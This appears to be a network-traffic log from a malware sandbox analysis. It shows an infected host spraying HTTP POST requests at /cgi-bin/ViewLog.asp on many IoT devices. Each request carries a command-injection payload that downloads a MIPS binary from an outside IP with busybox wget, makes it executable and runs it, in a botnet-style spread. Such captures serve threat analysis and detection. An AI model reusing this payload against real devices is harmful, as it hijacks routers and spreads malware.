                                              473192.168.2.134356694.110.120.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.910465002 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              474192.168.2.134946662.150.217.1278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.912800074 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.176980972 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              475192.168.2.134396294.253.103.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.918740034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.152697086 CET75INHTTP/1.1
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              476192.168.2.135996431.200.104.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.921883106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              477192.168.2.135222231.136.70.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.952150106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.534279108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.686280966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.182251930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.790247917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.006273031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.182173967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              478192.168.2.134594294.121.146.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.998198032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              479192.168.2.134681661.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.065845013 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:31Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              480192.168.2.135395294.120.160.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.103033066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              481192.168.2.133444062.221.97.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.289958954 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              482192.168.2.133725231.33.14.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.744976044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              483192.168.2.134687861.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.783164978 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:32Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              484192.168.2.134654095.86.90.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:38.803210974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              485192.168.2.134594462.29.86.1198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.280906916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.454265118 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.830293894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.742245913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.374237061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.382221937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              486192.168.2.133617085.74.2.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.300685883 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              487192.168.2.134105894.120.50.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.312036037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
